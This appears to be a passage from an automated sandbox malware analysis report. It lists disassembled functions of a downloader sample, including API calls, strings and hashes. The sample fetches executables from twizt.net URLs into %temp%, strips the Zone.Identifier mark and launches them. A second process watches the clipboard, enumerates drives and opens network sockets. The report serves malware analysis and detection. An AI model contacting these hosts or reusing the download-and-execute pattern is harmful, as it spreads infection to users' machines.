CloseHandle.KERNEL32(000000FF), ref: 005311D5
Sleep.KERNELBASE(000003E8), ref: 005311E0
wsprintfW.USER32 ref: 005311F9
DeleteFileW.KERNELBASE(?), ref: 00531209
Sleep.KERNELBASE(000003E8), ref: 00531214
CloseHandle.KERNEL32(000000FF), ref: 0053123F
InternetCloseHandle.WININET(00000000), ref: 0053124C
InternetCloseHandle.WININET(00000000), ref: 00531259
Sleep.KERNEL32(000003E8), ref: 00531264
rand.MSVCR90 ref: 00531279
rand.MSVCR90 ref: 0053128D
wsprintfW.USER32 ref: 005312B4
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 005312CE
wsprintfW.USER32 ref: 005312EA
DeleteFileW.KERNEL32(?), ref: 005312FA
Sleep.KERNEL32(000003E8), ref: 00531305

Strings

%s\%d%d.exe, xrefs: 005312A8
%s:Zone.Identifier, xrefs: 005312DE
%s\%d%d.exe, xrefs: 005310E5
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00531102
%s:Zone.Identifier, xrefs: 005311ED
%temp%, xrefs: 005310AB

Memory Dump Source

Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true

Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd

Similarity

API ID: File$Internet$CloseHandleSleeprandwsprintf$DeleteOpen$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
API String ID: 1642989748-1161929716
Opcode ID: 93b20563d106dd7e77837c963f891c77f1280e3bd7db06603c5f8e81d8eccb0b
Instruction ID: f8f757ce8c7913167954f9a37337be34aa126220793e111de369071fd5b00feb
Opcode Fuzzy Hash: 93b20563d106dd7e77837c963f891c77f1280e3bd7db06603c5f8e81d8eccb0b
Instruction Fuzzy Hash: 28619075940B18ABDB29DB60DC8EBEA7779BB58702F004598F30D921D0DB746B88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00531320 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531333
InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00531353
Sleep.KERNELBASE(000003E8), ref: 00531361
InternetCloseHandle.WININET(?), ref: 0053136B
Sleep.KERNELBASE(000003E8), ref: 00531376
InternetCloseHandle.WININET(00000000), ref: 00531380

Strings

http://twizt.net/peinstall.php, xrefs: 0053134A
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0053132E

Memory Dump Source

Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true

Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd

Similarity

API ID: Internet$CloseHandleOpenSleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/peinstall.php
API String ID: 256278798-2653881570
Opcode ID: 784d1a12f0a84e088c398efeed09d137ab517eb0b0d178e1f17923eb7fcf5f0e
Instruction ID: b53fb677b2877d558295a2ef72f4a66ba09f566db235cf5a5a4c14d204d38fee
Opcode Fuzzy Hash: 784d1a12f0a84e088c398efeed09d137ab517eb0b0d178e1f17923eb7fcf5f0e
Instruction Fuzzy Hash: E9F05438A80704FBE7289BA4DD4EF5C7BB4AB58B01F204545BB02763D0D6B06648DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00531390 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005313AA
wsprintfW.USER32 ref: 005313C3
PathFileExistsW.KERNELBASE(?), ref: 005313D3
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 005313F9
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00531415

Strings

%s\33573537.jpg, xrefs: 005313B7
%temp%, xrefs: 005313A5

Memory Dump Source

Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true

Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd

Similarity

API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
String ID: %s\33573537.jpg$%temp%
API String ID: 2220190937-2829634191
Opcode ID: d6b0f7190c55c125a46478fd5d671e23cf98e4c47d01b6fc2c26c0ed34a8d6c6
Instruction ID: d53cb4a754e031f216887dec5f03662e4fba04be963ee53a240db83fa2fac5bc
Opcode Fuzzy Hash: d6b0f7190c55c125a46478fd5d671e23cf98e4c47d01b6fc2c26c0ed34a8d6c6
Instruction Fuzzy Hash: CD01A7B4540708ABDB24DB60DC4DFE57738BB40704F0089A4B719961D1D6B05ACDDFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00531000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 0053100E
memset.MSVCR90 ref: 0053101E
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00531057
Sleep.KERNELBASE(000003E8), ref: 00531067

Strings

D, xrefs: 00531026

Memory Dump Source

Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true

Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd

Similarity

API ID: memset$CreateProcessSleep
String ID: D
API String ID: 3916249126-2746444292
Opcode ID: d0f04092d25710cf9668442a737fc5faaf8f15da7577434d4a7d096daab652a9
Instruction ID: 41c8592c218aa2b824b2ef44697ff255d45c654551186d2c09cee6d71f3f7e25
Opcode Fuzzy Hash: d0f04092d25710cf9668442a737fc5faaf8f15da7577434d4a7d096daab652a9
Instruction Fuzzy Hash: 36014471A80748B7EB149BE0CC4BFEE7B78AB68B00F100115F7046E1C1DAB5A5488B99

Uniqueness

Uniqueness Score: -1.00%

Function 00531430 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00531438

Part of subcall function 00531080: GetTickCount.KERNEL32 ref: 00531089
Part of subcall function 00531080: srand.MSVCR90 ref: 00531090
Part of subcall function 00531080: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005310B0
Part of subcall function 00531080: rand.MSVCR90 ref: 005310B6
Part of subcall function 00531080: rand.MSVCR90 ref: 005310CA
Part of subcall function 00531080: wsprintfW.USER32 ref: 005310F1
Part of subcall function 00531080: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531107
Part of subcall function 00531080: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00531133
Part of subcall function 00531080: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00531162
Part of subcall function 00531080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 00531195
Part of subcall function 00531080: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 005311C6
Part of subcall function 00531080: CloseHandle.KERNEL32(000000FF), ref: 005311D5
Part of subcall function 00531080: Sleep.KERNELBASE(000003E8), ref: 005311E0
Part of subcall function 00531080: wsprintfW.USER32 ref: 005311F9

Part of subcall function 00531390: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005313AA
Part of subcall function 00531390: wsprintfW.USER32 ref: 005313C3
Part of subcall function 00531390: PathFileExistsW.KERNELBASE(?), ref: 005313D3

Part of subcall function 00531320: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531333
Part of subcall function 00531320: InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00531353
Part of subcall function 00531320: Sleep.KERNELBASE(000003E8), ref: 00531361
Part of subcall function 00531320: InternetCloseHandle.WININET(?), ref: 0053136B
Part of subcall function 00531320: Sleep.KERNELBASE(000003E8), ref: 00531376
Part of subcall function 00531320: InternetCloseHandle.WININET(00000000), ref: 00531380

Strings

http://twizt.net/newtpp.exe, xrefs: 0053143E

Memory Dump Source

Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true

Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd

Similarity

API ID: Internet$FileOpenSleep$CloseHandlewsprintf$EnvironmentExpandStringsrand$CountCreateExistsPathReadTickWritesrand
String ID: http://twizt.net/newtpp.exe
API String ID: 1220973231-3495472230
Opcode ID: ec0aafc06127534a134bedc5a3af30d3f4ccae158571950ed0815cab13feec86
Instruction ID: e34f819b93c19fb18f3829af1fb0b800374b2b8bf993e62657c614703feb35a7
Opcode Fuzzy Hash: ec0aafc06127534a134bedc5a3af30d3f4ccae158571950ed0815cab13feec86
Instruction Fuzzy Hash: 79D01271544B0617950532F16D0F66A3F9C7A50795F440C22F506C4583ED85E01D64BB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 135143440.exePID: 6684, Parent PID: 3748COMMON

Execution Graph

Execution Coverage:	14.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.6%
Total number of Nodes:	1456
Total number of Limit Nodes:	38

Executed Functions

Function 00405910 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040591C
SetClipboardViewer.USER32(?), ref: 00405968
SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
OpenClipboard.USER32(00000000), ref: 00405A17
GetClipboardData.USER32(00000000), ref: 00405A29
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
ChangeClipboardChain.USER32(?,?), ref: 00405B3E
DefWindowProcA.USER32(?,?,?,?), ref: 00405B54

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
Instruction ID: e885106aa0884b4502b2237862738d0df8f48eeaae93079a212bc481fb1f7e33
Opcode Fuzzy Hash: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
Instruction Fuzzy Hash: E771FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00406B30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00406B3E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\135143440.exe,00000104), ref: 00406B50

Part of subcall function 0040E9B0: CreateFileW.KERNELBASE(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
Part of subcall function 0040E9B0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
Part of subcall function 0040E9B0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040E9F2

ExitThread.KERNEL32 ref: 00406CBA

Part of subcall function 00406340: GetLogicalDrives.KERNELBASE ref: 00406346
Part of subcall function 00406340: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
Part of subcall function 00406340: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
Part of subcall function 00406340: RegCloseKey.KERNELBASE(?), ref: 004063DE

Sleep.KERNELBASE(000007D0), ref: 00406CAD

Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406BEF
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C04
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C1F
wsprintfW.USER32 ref: 00406C32
wsprintfW.USER32 ref: 00406C52
wsprintfW.USER32 ref: 00406C75

Strings

%s%s, xrefs: 00406C69
C:\Users\user\AppData\Local\Temp\135143440.exe, xrefs: 00406B49, 00406B56
Unnamed volume, xrefs: 00406C46
(%dGB), xrefs: 00406C26

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseSleep$ChangeCreateDiskDrivesExitFindFreeInformationLogicalModuleNameNotificationOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$C:\Users\user\AppData\Local\Temp\135143440.exe$Unnamed volume
API String ID: 899515741-1730570867
Opcode ID: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
Instruction ID: ad18969486da017d66fc0e664040911e0da7e4c37c3c5655858771b0e8e5c1cf
Opcode Fuzzy Hash: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
Instruction Fuzzy Hash: 6B41A9B1900318BBE714DB94DD55FEE7378EB48700F0081A5F20AB51D0EA785794CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040D370: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D38E

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040D3A0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
Part of subcall function 0040D3A0: CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D41F
Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
Part of subcall function 0040D3A0: DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
Part of subcall function 0040D3A0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 74b9e0b9d866c09383cccfd39bbcccf3aa71ca47d8d5121f17440fa7680103a3
Instruction ID: df8ad55f307143f3a92c653802a821764c0c55d7be8f2a3f3e8fe1ebc27bb844
Opcode Fuzzy Hash: 74b9e0b9d866c09383cccfd39bbcccf3aa71ca47d8d5121f17440fa7680103a3
Instruction Fuzzy Hash: 3F41AF70640701ABD3309F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E845875A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D950 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
htons.WS2_32(0000076C), ref: 0040D9A0
inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD

Part of subcall function 0040ACC0: htons.WS2_32(00000050), ref: 0040ACED
Part of subcall function 0040ACC0: socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
Part of subcall function 0040ACC0: connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
Part of subcall function 0040ACC0: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58

bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45

Part of subcall function 0040DAD0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
Part of subcall function 0040DAD0: Sleep.KERNELBASE(000003E8), ref: 0040DB2E
Part of subcall function 0040DAD0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
Part of subcall function 0040DAD0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
Part of subcall function 0040DAD0: StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E

Strings

239.255.255.250, xrefs: 0040D9AA

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250
API String ID: 726339449-2186272203
Opcode ID: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
Instruction ID: 776be564c15d3a67ad3e8e206458624d982b0507424591c965b87a75806c6374
Opcode Fuzzy Hash: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
Instruction Fuzzy Hash: 1541E9B4E04208ABDB14DFE4D889BEEBBB5AF48304F108169E505B7390E7B55A44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(Function_00001100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(Function_00001100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

CreateThread.KERNELBASE(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
Instruction ID: 9f6d7f02e8121356806164c5164031e4b64ed467ed2b657d4572fa9387097a74
Opcode Fuzzy Hash: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
Instruction Fuzzy Hash: E131C871A44301AFE320DF649C46F9BB6E0AF48B10F40493DF695EB2E0D3B5D544879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040ACED

Part of subcall function 0040AC80: inet_addr.WS2_32(0040AD01), ref: 0040AC8A
Part of subcall function 0040AC80: gethostbyname.WS2_32(?), ref: 0040AC9D

socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58

Strings

www.update.microsoft.com, xrefs: 0040ACF7

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
Instruction ID: ba3e2b0e6fec23725a126dc2d5d77dfcfe6771dbae9c9e174257d4c79807ff88
Opcode Fuzzy Hash: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
Instruction Fuzzy Hash: BA210BB5E103099BDB04DFF8D946AEEBBB5AF08300F108169E515F7390E7745A44CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(~|@,00000000,00000000,00000001,F0000040,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0D3
CryptGenRandom.ADVAPI32(~|@,?,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0E9
CryptReleaseContext.ADVAPI32(~|@,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0F5

Strings

~|@, xrefs: 0040C0CF, 0040C0E5, 0040C0F1, 0040C0D2, 0040C0E8, 0040C0F4

Memory Dump Source

Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_135143440.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: ~|@
API String ID: 1815803762-1417210658
Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
Instruction ID: 64b452c5f04e5b6757705d6885a7ff86aea398e2a213dd3f660bad642ac62f97
Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
Instruction Fuzzy Hash: F6E01275654208FBDB24CFD5EC49FDA776CAB48700F108154F709A7190DAB5EA40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(Function_00001100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
